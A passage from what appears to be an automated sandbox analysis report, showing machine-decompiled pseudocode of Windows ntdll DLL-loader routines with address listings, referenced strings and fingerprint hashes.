                                                                                  						}
                                                                                  					}
                                                                                  					if(_t275 == 0) {
                                                                                  						L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                  						_v40 = _t280;
                                                                                  						_v20 = _t280;
                                                                                  					}
                                                                                  					_t225 = _v8;
                                                                                  					if(_v8 != 0) {
                                                                                  						L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                  					}
                                                                                  					_v8 = _t280;
                                                                                  					goto L16;
                                                                                  				}
                                                                                  			}










































                                                                                  0x00eb3d3c
                                                                                  0x00eb3d42
                                                                                  0x00eb3d44
                                                                                  0x00eb3d46
                                                                                  0x00eb3d49
                                                                                  0x00eb3d4c
                                                                                  0x00eb3d4f
                                                                                  0x00eb3d52
                                                                                  0x00eb3d55
                                                                                  0x00eb3d58
                                                                                  0x00eb3d5b
                                                                                  0x00eb3d5f
                                                                                  0x00eb3d61
                                                                                  0x00eb3d66
                                                                                  0x00f08213
                                                                                  0x00f08218
                                                                                  0x00eb4085
                                                                                  0x00eb4088
                                                                                  0x00eb408e
                                                                                  0x00eb4094
                                                                                  0x00eb409a
                                                                                  0x00eb40a0
                                                                                  0x00eb40a6
                                                                                  0x00eb40a9
                                                                                  0x00eb40af
                                                                                  0x00eb40b6
                                                                                  0x00eb40bd
                                                                                  0x00eb40bd
                                                                                  0x00eb3d83
                                                                                  0x00f0821f
                                                                                  0x00f08229
                                                                                  0x00f08238
                                                                                  0x00f08238
                                                                                  0x00f0823d
                                                                                  0x00f0823d
                                                                                  0x00eb3da0
                                                                                  0x00eb3daf
                                                                                  0x00eb3db5
                                                                                  0x00eb3dba
                                                                                  0x00eb3dba
                                                                                  0x00eb3dd4
                                                                                  0x00eb3e94
                                                                                  0x00eb3eab
                                                                                  0x00eb3f6d
                                                                                  0x00eb3f84
                                                                                  0x00eb406b
                                                                                  0x00eb406b
                                                                                  0x00eb406e
                                                                                  0x00eb406e
                                                                                  0x00eb4070
                                                                                  0x00eb4074
                                                                                  0x00f08351
                                                                                  0x00f08351
                                                                                  0x00eb407a
                                                                                  0x00eb407f
                                                                                  0x00f0835d
                                                                                  0x00f08370
                                                                                  0x00f08377
                                                                                  0x00f08379
                                                                                  0x00f0837c
                                                                                  0x00f0837c
                                                                                  0x00f0835d
                                                                                  0x00000000
                                                                                  0x00eb407f
                                                                                  0x00eb3f8a
                                                                                  0x00eb3f8d
                                                                                  0x00eb3f90
                                                                                  0x00eb3f95
                                                                                  0x00f0830d
                                                                                  0x00f0830f
                                                                                  0x00eb3f9b
                                                                                  0x00eb3fac
                                                                                  0x00eb3fae
                                                                                  0x00eb3fb1
                                                                                  0x00eb3fb1
                                                                                  0x00eb3fb6
                                                                                  0x00f08317
                                                                                  0x00f0831a
                                                                                  0x00000000
                                                                                  0x00eb3fbc
                                                                                  0x00eb3fc1
                                                                                  0x00eb3fc9
                                                                                  0x00eb3fd7
                                                                                  0x00eb3fda
                                                                                  0x00eb3fdd
                                                                                  0x00eb4021
                                                                                  0x00eb4021
                                                                                  0x00eb4029
                                                                                  0x00eb4030
                                                                                  0x00eb4044
                                                                                  0x00eb4046
                                                                                  0x00eb4046
                                                                                  0x00eb4044
                                                                                  0x00eb4049
                                                                                  0x00f08327
                                                                                  0x00f08334
                                                                                  0x00f08339
                                                                                  0x00f0833c
                                                                                  0x00eb404f
                                                                                  0x00eb404f
                                                                                  0x00eb404f
                                                                                  0x00eb4051
                                                                                  0x00eb4056
                                                                                  0x00eb4063
                                                                                  0x00eb4063
                                                                                  0x00eb4068
                                                                                  0x00000000
                                                                                  0x00eb4068
                                                                                  0x00eb3fdf
                                                                                  0x00eb3fe2
                                                                                  0x00eb3fe4
                                                                                  0x00eb3fe7
                                                                                  0x00eb3fef
                                                                                  0x00eb4003
                                                                                  0x00eb4005
                                                                                  0x00eb4005
                                                                                  0x00eb400c
                                                                                  0x00eb4013
                                                                                  0x00eb4016
                                                                                  0x00eb4017
                                                                                  0x00eb401b
                                                                                  0x00eb401e
                                                                                  0x00000000
                                                                                  0x00eb401e
                                                                                  0x00eb3fb6
                                                                                  0x00eb3eb1
                                                                                  0x00eb3eb4
                                                                                  0x00eb3eb7
                                                                                  0x00eb3ebc
                                                                                  0x00f082a9
                                                                                  0x00f082ab
                                                                                  0x00eb3ec2
                                                                                  0x00eb3ed3
                                                                                  0x00eb3ed5
                                                                                  0x00eb3ed8
                                                                                  0x00eb3ed8
                                                                                  0x00eb3edd
                                                                                  0x00f082b3
                                                                                  0x00f082b6
                                                                                  0x00000000
                                                                                  0x00eb3ee3
                                                                                  0x00eb3ee8
                                                                                  0x00eb3eed
                                                                                  0x00eb3ef0
                                                                                  0x00eb3ef3
                                                                                  0x00eb3f02
                                                                                  0x00eb3f05
                                                                                  0x00eb3f08
                                                                                  0x00f082c0
                                                                                  0x00f082c3
                                                                                  0x00f082c5
                                                                                  0x00f082c8
                                                                                  0x00f082d0
                                                                                  0x00f082e4
                                                                                  0x00f082e6
                                                                                  0x00f082e6
                                                                                  0x00f082ed
                                                                                  0x00f082f4
                                                                                  0x00f082f7
                                                                                  0x00f082f8
                                                                                  0x00f082fc
                                                                                  0x00f082ff
                                                                                  0x00f082ff
                                                                                  0x00eb3f0e
                                                                                  0x00eb3f11
                                                                                  0x00eb3f16
                                                                                  0x00eb3f1d
                                                                                  0x00eb3f31
                                                                                  0x00f08307
                                                                                  0x00f08307
                                                                                  0x00eb3f31
                                                                                  0x00eb3f39
                                                                                  0x00eb3f48
                                                                                  0x00eb3f4d
                                                                                  0x00eb3f50
                                                                                  0x00eb3f50
                                                                                  0x00eb3f53
                                                                                  0x00eb3f58
                                                                                  0x00eb3f65
                                                                                  0x00eb3f65
                                                                                  0x00eb3f6a
                                                                                  0x00000000
                                                                                  0x00eb3f6a
                                                                                  0x00eb3edd
                                                                                  0x00eb3dda
                                                                                  0x00eb3ddd
                                                                                  0x00eb3de0
                                                                                  0x00eb3de5
                                                                                  0x00f08245
                                                                                  0x00eb3deb
                                                                                  0x00eb3df7
                                                                                  0x00eb3dfc
                                                                                  0x00eb3dfe
                                                                                  0x00eb3e01
                                                                                  0x00eb3e01
                                                                                  0x00eb3e06
                                                                                  0x00f0824d
                                                                                  0x00f0824f
                                                                                  0x00f08254
                                                                                  0x00000000
                                                                                  0x00eb3e0c
                                                                                  0x00eb3e11
                                                                                  0x00eb3e16
                                                                                  0x00eb3e19
                                                                                  0x00eb3e29
                                                                                  0x00eb3e2c
                                                                                  0x00eb3e2f
                                                                                  0x00f0825c
                                                                                  0x00f0825f
                                                                                  0x00f08261
                                                                                  0x00f08264
                                                                                  0x00f0826c
                                                                                  0x00f08280
                                                                                  0x00f08282
                                                                                  0x00f08282
                                                                                  0x00f08289
                                                                                  0x00f08290
                                                                                  0x00f08293
                                                                                  0x00f08294
                                                                                  0x00f08298
                                                                                  0x00f0829b
                                                                                  0x00f0829b
                                                                                  0x00eb3e35
                                                                                  0x00eb3e38
                                                                                  0x00eb3e3d
                                                                                  0x00eb3e44
                                                                                  0x00eb3e58
                                                                                  0x00f082a3
                                                                                  0x00f082a3
                                                                                  0x00eb3e58
                                                                                  0x00eb3e60
                                                                                  0x00eb3e6f
                                                                                  0x00eb3e74
                                                                                  0x00eb3e77
                                                                                  0x00eb3e77
                                                                                  0x00eb3e7a
                                                                                  0x00eb3e7f
                                                                                  0x00eb3e8c
                                                                                  0x00eb3e8c
                                                                                  0x00eb3e91
                                                                                  0x00000000
                                                                                  0x00eb3e91

                                                                                  Strings
                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 00EB3D8C
                                                                                  • Kernel-MUI-Language-SKU, xrefs: 00EB3F70
                                                                                  • WindowsExcludedProcs, xrefs: 00EB3D6F
                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 00EB3DC0
                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 00EB3E97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                  • API String ID: 0-258546922
                                                                                  • Opcode ID: 64087f7262ad8b93343fd69a3a7567d6fef1e37e3f730b640259932694739592
                                                                                  • Instruction ID: 46f4bb35bf05bb4a64503d34953bac120537d1822d88b42eb70dac8f0d5e965e
                                                                                  • Opcode Fuzzy Hash: 64087f7262ad8b93343fd69a3a7567d6fef1e37e3f730b640259932694739592
                                                                                  • Instruction Fuzzy Hash: 3EF118B2D00619EBCB11DFA8C981AEFBBF9EF48750F15106AE505B7251E7319E01DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E00ED8E00(void* __ecx) {
                                                                                  				signed int _v8;
                                                                                  				char _v12;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr* _t32;
                                                                                  				intOrPtr _t35;
                                                                                  				intOrPtr _t43;
                                                                                  				void* _t46;
                                                                                  				intOrPtr _t47;
                                                                                  				void* _t48;
                                                                                  				signed int _t49;
                                                                                  				void* _t50;
                                                                                  				intOrPtr* _t51;
                                                                                  				signed int _t52;
                                                                                  				void* _t53;
                                                                                  				intOrPtr _t55;
                                                                                  
                                                                                  				_v8 =  *0xf9d360 ^ _t52;
                                                                                  				_t49 = 0;
                                                                                  				_t48 = __ecx;
                                                                                  				_t55 =  *0xf98464; // 0x75150110
                                                                                  				if(_t55 == 0) {
                                                                                  					L9:
                                                                                  					if( !_t49 >= 0) {
                                                                                  						if(( *0xf95780 & 0x00000003) != 0) {
                                                                                  							E00F25510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                  						}
                                                                                  						if(( *0xf95780 & 0x00000010) != 0) {
                                                                                  							asm("int3");
                                                                                  						}
                                                                                  					}
                                                                                  					return E00EEB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                  				}
                                                                                  				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                  				_t43 =  *0xf97984; // 0xbe2b78
                                                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                  					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                  					if(_t48 == _t43) {
                                                                                  						_t50 = 0x5c;
                                                                                  						if( *_t32 == _t50) {
                                                                                  							_t46 = 0x3f;
                                                                                  							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                  								_t32 = _t32 + 8;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t51 =  *0xf98464; // 0x75150110
                                                                                  					 *0xf9b1e0(_t47, _t32,  &_v12);
                                                                                  					_t49 =  *_t51();
                                                                                  					if(_t49 >= 0) {
                                                                                  						L8:
                                                                                  						_t35 = _v12;
                                                                                  						if(_t35 != 0) {
                                                                                  							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                  								E00ED9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                  								_t35 = _v12;
                                                                                  							}
                                                                                  							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                  						}
                                                                                  						goto L9;
                                                                                  					}
                                                                                  					if(_t49 != 0xc000008a) {
                                                                                  						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                  							if(_t49 != 0xc00000bb) {
                                                                                  								goto L8;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					if(( *0xf95780 & 0x00000005) != 0) {
                                                                                  						_push(_t49);
                                                                                  						E00F25510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                  						_t53 = _t53 + 0x1c;
                                                                                  					}
                                                                                  					_t49 = 0;
                                                                                  					goto L8;
                                                                                  				} else {
                                                                                  					goto L9;
                                                                                  				}
                                                                                  			}




















                                                                                  0x00ed8e0f
                                                                                  0x00ed8e16
                                                                                  0x00ed8e19
                                                                                  0x00ed8e1b
                                                                                  0x00ed8e21
                                                                                  0x00ed8e7f
                                                                                  0x00ed8e85
                                                                                  0x00f19354
                                                                                  0x00f1936c
                                                                                  0x00f19371
                                                                                  0x00f1937b
                                                                                  0x00f19381
                                                                                  0x00f19381
                                                                                  0x00f1937b
                                                                                  0x00ed8e9d
                                                                                  0x00ed8e9d
                                                                                  0x00ed8e29
                                                                                  0x00ed8e2c
                                                                                  0x00ed8e38
                                                                                  0x00ed8e3e
                                                                                  0x00ed8e43
                                                                                  0x00ed8eb5
                                                                                  0x00ed8eb9
                                                                                  0x00f192aa
                                                                                  0x00f192af
                                                                                  0x00f192e8
                                                                                  0x00f192e8
                                                                                  0x00f192af
                                                                                  0x00ed8eb9
                                                                                  0x00ed8e45
                                                                                  0x00ed8e53
                                                                                  0x00ed8e5b
                                                                                  0x00ed8e5f
                                                                                  0x00ed8e78
                                                                                  0x00ed8e78
                                                                                  0x00ed8e7d
                                                                                  0x00ed8ec3
                                                                                  0x00ed8ecd
                                                                                  0x00ed8ed2
                                                                                  0x00ed8ed2
                                                                                  0x00ed8ec5
                                                                                  0x00ed8ec5
                                                                                  0x00000000
                                                                                  0x00ed8e7d
                                                                                  0x00ed8e67
                                                                                  0x00ed8ea4
                                                                                  0x00f1931a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f19320
                                                                                  0x00ed8ea4
                                                                                  0x00ed8e70
                                                                                  0x00f19325
                                                                                  0x00f19340
                                                                                  0x00f19345
                                                                                  0x00f19345
                                                                                  0x00ed8e76
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 00F1933B, 00F19367
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 00F19357
                                                                                  • LdrpFindDllActivationContext, xrefs: 00F19331, 00F1935D
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00F1932A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 0-3779518884
                                                                                  • Opcode ID: b4717b8aace0267c16a3c3e90742c981e693de66039ee2f99ce0937f17fd13f2
                                                                                  • Instruction ID: c7d8c390697c3bd47dff6922f8e52cdbe0fada7da8b177ef2159541345ef4deb
                                                                                  • Opcode Fuzzy Hash: b4717b8aace0267c16a3c3e90742c981e693de66039ee2f99ce0937f17fd13f2
                                                                                  • Instruction Fuzzy Hash: F3412B32A003159EDB35AB188E49A79B3B4FB1075CF05652BEC4877391EF70AD819BC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E00EB8794(void* __ecx) {
                                                                                  				signed int _v0;
                                                                                  				char _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _v32;
                                                                                  				signed int _v40;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				intOrPtr* _t77;
                                                                                  				signed int _t80;
                                                                                  				signed char _t81;
                                                                                  				signed int _t87;
                                                                                  				signed int _t91;
                                                                                  				void* _t92;
                                                                                  				void* _t94;
                                                                                  				signed int _t95;
                                                                                  				signed int _t103;
                                                                                  				signed int _t105;
                                                                                  				signed int _t110;
                                                                                  				signed int _t118;
                                                                                  				intOrPtr* _t121;
                                                                                  				intOrPtr _t122;
                                                                                  				signed int _t125;
                                                                                  				signed int _t129;
                                                                                  				signed int _t131;
                                                                                  				signed int _t134;
                                                                                  				signed int _t136;
                                                                                  				signed int _t143;
                                                                                  				signed int* _t147;
                                                                                  				signed int _t151;
                                                                                  				void* _t153;
                                                                                  				signed int* _t157;
                                                                                  				signed int _t159;
                                                                                  				signed int _t161;
                                                                                  				signed int _t166;
                                                                                  				signed int _t168;
                                                                                  
                                                                                  				_push(__ecx);
                                                                                  				_t153 = __ecx;
                                                                                  				_t159 = 0;
                                                                                  				_t121 = __ecx + 0x3c;
                                                                                  				if( *_t121 == 0) {
                                                                                  					L2:
                                                                                  					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                  					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                  						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                  						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                  						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                  							L6:
                                                                                  							if(E00EB934A() != 0) {
                                                                                  								_t159 = E00F2A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                  								__eflags = _t159;
                                                                                  								if(_t159 < 0) {
                                                                                  									_t81 =  *0xf95780; // 0x0
                                                                                  									__eflags = _t81 & 0x00000003;
                                                                                  									if((_t81 & 0x00000003) != 0) {
                                                                                  										_push(_t159);
                                                                                  										E00F25510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                  										_t81 =  *0xf95780; // 0x0
                                                                                  									}
                                                                                  									__eflags = _t81 & 0x00000010;
                                                                                  									if((_t81 & 0x00000010) != 0) {
                                                                                  										asm("int3");
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						} else {
                                                                                  							_t159 = E00EB849B(0, _t122, _t153, _t159, _t180);
                                                                                  							if(_t159 >= 0) {
                                                                                  								goto L6;
                                                                                  							}
                                                                                  						}
                                                                                  						_t80 = _t159;
                                                                                  						goto L8;
                                                                                  					} else {
                                                                                  						_t125 = 0x13;
                                                                                  						asm("int 0x29");
                                                                                  						_push(0);
                                                                                  						_push(_t159);
                                                                                  						_t161 = _t125;
                                                                                  						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                  						_t143 = 0;
                                                                                  						_v40 = _t161;
                                                                                  						_t118 = 0;
                                                                                  						_push(_t153);
                                                                                  						__eflags = _t87;
                                                                                  						if(_t87 != 0) {
                                                                                  							_t118 = _t87 + 0x5d8;
                                                                                  							__eflags = _t118;
                                                                                  							if(_t118 == 0) {
                                                                                  								L46:
                                                                                  								_t118 = 0;
                                                                                  							} else {
                                                                                  								__eflags =  *(_t118 + 0x30);
                                                                                  								if( *(_t118 + 0x30) == 0) {
                                                                                  									goto L46;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_v32 = 0;
                                                                                  						_v28 = 0;
                                                                                  						_v16 = 0;
                                                                                  						_v20 = 0;
                                                                                  						_v12 = 0;
                                                                                  						__eflags = _t118;
                                                                                  						if(_t118 != 0) {
                                                                                  							__eflags = _t161;
                                                                                  							if(_t161 != 0) {
                                                                                  								__eflags =  *(_t118 + 8);
                                                                                  								if( *(_t118 + 8) == 0) {
                                                                                  									L22:
                                                                                  									_t143 = 1;
                                                                                  									__eflags = 1;
                                                                                  								} else {
                                                                                  									_t19 = _t118 + 0x40; // 0x40
                                                                                  									_t156 = _t19;
                                                                                  									E00EB8999(_t19,  &_v16);
                                                                                  									__eflags = _v0;
                                                                                  									if(_v0 != 0) {
                                                                                  										__eflags = _v0 - 1;
                                                                                  										if(_v0 != 1) {
                                                                                  											goto L22;
                                                                                  										} else {
                                                                                  											_t128 =  *(_t161 + 0x64);
                                                                                  											__eflags =  *(_t161 + 0x64);
                                                                                  											if( *(_t161 + 0x64) == 0) {
                                                                                  												goto L22;
                                                                                  											} else {
                                                                                  												E00EB8999(_t128,  &_v12);
                                                                                  												_t147 = _v12;
                                                                                  												_t91 = 0;
                                                                                  												__eflags = 0;
                                                                                  												_t129 =  *_t147;
                                                                                  												while(1) {
                                                                                  													__eflags =  *((intOrPtr*)(0xf95c60 + _t91 * 8)) - _t129;
                                                                                  													if( *((intOrPtr*)(0xf95c60 + _t91 * 8)) == _t129) {
                                                                                  														break;
                                                                                  													}
                                                                                  													_t91 = _t91 + 1;
                                                                                  													__eflags = _t91 - 5;
                                                                                  													if(_t91 < 5) {
                                                                                  														continue;
                                                                                  													} else {
                                                                                  														_t131 = 0;
                                                                                  														__eflags = 0;
                                                                                  													}
                                                                                  													L37:
                                                                                  													__eflags = _t131;
                                                                                  													if(_t131 != 0) {
                                                                                  														goto L22;
                                                                                  													} else {
                                                                                  														__eflags = _v16 - _t147;
                                                                                  														if(_v16 != _t147) {
                                                                                  															goto L22;
                                                                                  														} else {
                                                                                  															E00EC2280(_t92, 0xf986cc);
                                                                                  															_t94 = E00F79DFB( &_v20);
                                                                                  															__eflags = _t94 - 1;
                                                                                  															if(_t94 != 1) {
                                                                                  															}
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															 *_t118 =  *_t118 + 1;
                                                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                                                  															_t95 = E00ED61A0( &_v32);
                                                                                  															__eflags = _t95;
                                                                                  															if(_t95 != 0) {
                                                                                  																__eflags = _v32 | _v28;
                                                                                  																if((_v32 | _v28) != 0) {
                                                                                  																	_t71 = _t118 + 0x40; // 0x3f
                                                                                  																	_t134 = _t71;
                                                                                  																	goto L55;
                                                                                  																}
                                                                                  															}
                                                                                  															goto L30;
                                                                                  														}
                                                                                  													}
                                                                                  													goto L56;
                                                                                  												}
                                                                                  												_t92 = 0xf95c64 + _t91 * 8;
                                                                                  												asm("lock xadd [eax], ecx");
                                                                                  												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                  												goto L37;
                                                                                  											}
                                                                                  										}
                                                                                  										goto L56;
                                                                                  									} else {
                                                                                  										_t143 = E00EB8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                  										__eflags = _t143;
                                                                                  										if(_t143 != 0) {
                                                                                  											_t157 = _v12;
                                                                                  											_t103 = 0;
                                                                                  											__eflags = 0;
                                                                                  											_t136 =  &(_t157[1]);
                                                                                  											 *(_t161 + 0x64) = _t136;
                                                                                  											_t151 =  *_t157;
                                                                                  											_v20 = _t136;
                                                                                  											while(1) {
                                                                                  												__eflags =  *((intOrPtr*)(0xf95c60 + _t103 * 8)) - _t151;
                                                                                  												if( *((intOrPtr*)(0xf95c60 + _t103 * 8)) == _t151) {
                                                                                  													break;
                                                                                  												}
                                                                                  												_t103 = _t103 + 1;
                                                                                  												__eflags = _t103 - 5;
                                                                                  												if(_t103 < 5) {
                                                                                  													continue;
                                                                                  												}
                                                                                  												L21:
                                                                                  												_t105 = E00EEF380(_t136, 0xe81184, 0x10);
                                                                                  												__eflags = _t105;
                                                                                  												if(_t105 != 0) {
                                                                                  													__eflags =  *_t157 -  *_v16;
                                                                                  													if( *_t157 >=  *_v16) {
                                                                                  														goto L22;
                                                                                  													} else {
                                                                                  														asm("cdq");
                                                                                  														_t166 = _t157[5] & 0x0000ffff;
                                                                                  														_t108 = _t157[5] & 0x0000ffff;
                                                                                  														asm("cdq");
                                                                                  														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                  														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                  														if(__eflags > 0) {
                                                                                  															L29:
                                                                                  															E00EC2280(_t108, 0xf986cc);
                                                                                  															 *_t118 =  *_t118 + 1;
                                                                                  															_t42 = _t118 + 0x40; // 0x3f
                                                                                  															_t156 = _t42;
                                                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															_t110 = E00ED61A0( &_v32);
                                                                                  															__eflags = _t110;
                                                                                  															if(_t110 != 0) {
                                                                                  																__eflags = _v32 | _v28;
                                                                                  																if((_v32 | _v28) != 0) {
                                                                                  																	_t134 = _v20;
                                                                                  																	L55:
                                                                                  																	E00F79D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                  																}
                                                                                  															}
                                                                                  															L30:
                                                                                  															 *_t118 =  *_t118 + 1;
                                                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                                                  															E00EBFFB0(_t118, _t156, 0xf986cc);
                                                                                  															goto L22;
                                                                                  														} else {
                                                                                  															if(__eflags < 0) {
                                                                                  																goto L22;
                                                                                  															} else {
                                                                                  																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                  																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                  																	goto L22;
                                                                                  																} else {
                                                                                  																	goto L29;
                                                                                  																}
                                                                                  															}
                                                                                  														}
                                                                                  													}
                                                                                  													goto L56;
                                                                                  												}
                                                                                  												goto L22;
                                                                                  											}
                                                                                  											asm("lock inc dword [eax]");
                                                                                  											goto L21;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						return _t143;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_push( &_v8);
                                                                                  					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                  					_push(__ecx + 0x40);
                                                                                  					_push(_t121);
                                                                                  					_push(0xffffffff);
                                                                                  					_t80 = E00EE9A00();
                                                                                  					_t159 = _t80;
                                                                                  					if(_t159 < 0) {
                                                                                  						L8:
                                                                                  						return _t80;
                                                                                  					} else {
                                                                                  						goto L2;
                                                                                  					}
                                                                                  				}
                                                                                  				L56:
                                                                                  			}












































                                                                                  0x00eb8799
                                                                                  0x00eb879d
                                                                                  0x00eb87a1
                                                                                  0x00eb87a3
                                                                                  0x00eb87a8
                                                                                  0x00eb87c3
                                                                                  0x00eb87c3
                                                                                  0x00eb87c8
                                                                                  0x00eb87d1
                                                                                  0x00eb87d4
                                                                                  0x00eb87d8
                                                                                  0x00eb87e5
                                                                                  0x00eb87ec
                                                                                  0x00f09bfe
                                                                                  0x00f09c00
                                                                                  0x00f09c02
                                                                                  0x00f09c08
                                                                                  0x00f09c0d
                                                                                  0x00f09c0f
                                                                                  0x00f09c14
                                                                                  0x00f09c2d
                                                                                  0x00f09c32
                                                                                  0x00f09c37
                                                                                  0x00f09c3a
                                                                                  0x00f09c3c
                                                                                  0x00f09c42
                                                                                  0x00f09c42
                                                                                  0x00f09c3c
                                                                                  0x00f09c02
                                                                                  0x00eb87da
                                                                                  0x00eb87df
                                                                                  0x00eb87e3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb87e3
                                                                                  0x00eb87f2
                                                                                  0x00000000
                                                                                  0x00eb87fb
                                                                                  0x00eb87fd
                                                                                  0x00eb87fe
                                                                                  0x00eb880e
                                                                                  0x00eb880f
                                                                                  0x00eb8810
                                                                                  0x00eb8814
                                                                                  0x00eb881a
                                                                                  0x00eb881c
                                                                                  0x00eb881f
                                                                                  0x00eb8821
                                                                                  0x00eb8822
                                                                                  0x00eb8824
                                                                                  0x00eb8826
                                                                                  0x00eb882c
                                                                                  0x00eb882e
                                                                                  0x00f09c48
                                                                                  0x00f09c48
                                                                                  0x00eb8834
                                                                                  0x00eb8834
                                                                                  0x00eb8837
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb8837
                                                                                  0x00eb882e
                                                                                  0x00eb883d
                                                                                  0x00eb8840
                                                                                  0x00eb8843
                                                                                  0x00eb8846
                                                                                  0x00eb8849
                                                                                  0x00eb884c
                                                                                  0x00eb884e
                                                                                  0x00eb8850
                                                                                  0x00eb8852
                                                                                  0x00eb8854
                                                                                  0x00eb8857
                                                                                  0x00eb88b4
                                                                                  0x00eb88b6
                                                                                  0x00eb88b6
                                                                                  0x00eb8859
                                                                                  0x00eb8859
                                                                                  0x00eb8859
                                                                                  0x00eb8861
                                                                                  0x00eb8866
                                                                                  0x00eb886a
                                                                                  0x00eb893d
                                                                                  0x00eb8941
                                                                                  0x00000000
                                                                                  0x00eb8947
                                                                                  0x00eb8947
                                                                                  0x00eb894a
                                                                                  0x00eb894c
                                                                                  0x00000000
                                                                                  0x00eb8952
                                                                                  0x00eb8955
                                                                                  0x00eb895a
                                                                                  0x00eb895d
                                                                                  0x00eb895d
                                                                                  0x00eb895f
                                                                                  0x00eb8961
                                                                                  0x00eb8961
                                                                                  0x00eb8968
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00eb896a
                                                                                  0x00eb896b
                                                                                  0x00eb896e
                                                                                  0x00000000
